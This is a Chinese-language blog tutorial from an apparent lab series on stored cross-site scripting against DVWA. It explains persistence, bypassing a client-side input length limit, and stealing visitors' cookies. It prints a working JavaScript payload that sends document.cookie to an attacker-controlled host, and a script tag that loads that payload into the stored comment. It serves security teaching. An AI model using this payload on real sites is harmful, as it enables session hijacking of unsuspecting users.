美文网首页
二十五、XSS跨站攻击-(4)存储型xss

二十五、XSS跨站攻击-(4)存储型xss

作者: cybeyond | 来源:发表于2017-12-15 10:41 被阅读0次
                                       目录
    

    1.特点
    2.存储型xss盗取cookie

    1、特点

    • 长期存储于服务端
    • 每次用户访问都会执行javascript脚本,而反射型需要通过诱使用户去点击

    在存储性跨站中,留言板Message里面输入一段js,然后点击提交,以后访问此页面的每个用户都会出现此弹出页。


    输入js 存储型xss每次弹出
    由于在网页Name中有字数限制,即存在Name客户端表单长度限制,因此没法直接输入js,可以通过burpsuite输入(防范的方法是不仅在客户端限制,也要在服务端限制) 输入js

    点击go后,查看reponse报文,并通过“show reponse in browser”查看是否弹出xssed


    在浏览器中查看响应url 点击copy 弹出xssed

    2、存储型xss盗取cookie

    首先在kali上写一段js脚本b.js,j将其放于/var/www/html/目录下,用于用户访问时能够被调用执行

    var img = new Image();
    img.src = "http://192.168.50.115:88/cookies.php?cookie="+document.cookie;
    

    随后在kali上开启apache

    #service apache2 start
    

    测试能否访问到b.js


    正常访问b.js

    然后在kali上开启监听88端口


    监听88端口

    由于上面描述的,在dvwa的stored xss的name输入有长度限制,可以通过burpsuite,也可以通过html直接修改


    找到name输入长度限制 修改长度限制为999

    最后向其输入js代码

    <script src=http://192.168.50.115/b.js></script>
    
    输入js

    点击提交,此时查看效果,js已经保存在服务端,其他用户点击就会将cookie发送到kali上

    查看cookie1

    从宿主机上,当点击此页面的时候,重新启动监听后,能够得到其他用户的cookie


    查看cookie2

    相关文章

      网友评论

          本文标题:二十五、XSS跨站攻击-(4)存储型xss

          本文链接:https://www.haomeiwen.com/subject/zoxwixtx.html